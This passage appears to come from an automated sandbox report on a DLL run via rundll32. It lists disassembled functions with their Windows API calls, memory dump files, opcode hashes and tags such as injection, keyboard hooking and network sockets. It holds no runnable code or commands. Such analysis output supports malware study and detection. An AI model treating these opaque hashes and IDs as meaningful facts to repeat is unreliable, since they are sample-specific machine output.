                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                                                            • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                                                            • __init_pointers.LIBCMT ref: 10035552
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                                                            • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                                                            • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                                                            • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                            • API String ID: 4287529916-3819984048
                                                                                                                                                            • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                                            • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                                                            • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                                            • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                                                              • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                                                            • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                                                            • _memset.LIBCMT ref: 1001CA70
                                                                                                                                                            • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                                                            • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                                                            • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                                                            • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                                                            • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                                                            • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                                                            • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                                                            • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                                            • API String ID: 867647115-4034971020
                                                                                                                                                            • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                                            • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                                                            • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                                            • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4128688680-0
                                                                                                                                                            • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                                            • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                                                            • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                                            • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                            • API String ID: 667068680-68207542
                                                                                                                                                            • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                                            • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                                                            • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                                            • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 656273425-0
                                                                                                                                                            • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                                            • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                                                            • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                                            • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                                            • GetParent.USER32(?), ref: 1001AA75
                                                                                                                                                            • SendMessageA.USER32 ref: 1001AA98
                                                                                                                                                            • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                                                            • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                                                            • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                                                            • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                                                            • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                                            • String ID: (
                                                                                                                                                            • API String ID: 808654186-3887548279
                                                                                                                                                            • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                                            • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                                                            • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                                            • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 100161DE
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                                                            • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                                                            • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3191170017-0
                                                                                                                                                            • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                                            • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                                                            • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                                            • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                                            • API String ID: 667068680-3617302793
                                                                                                                                                            • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                                            • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                                                            • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                                            • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                                                            • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                                                            • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                                                            • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                                                            • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                                                              • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                                                              • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                                            • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                                            • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                                            • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                                            • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1509511306-0
                                                                                                                                                            • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                                            • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                                                            • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                                            • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                                                            • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                                                            • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                                                              • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                                                              • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                                                            • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                                                            • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                                                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                                                              • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                                                            • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                                            • String ID: AfxOldWndProc423
                                                                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                                                                            • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                                            • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                                                            • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                                            • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                                              • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                                            • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                                                            • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                                                              • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                                                              • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                                                            • _printf.LIBCMT ref: 10012F79
                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                                                            • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
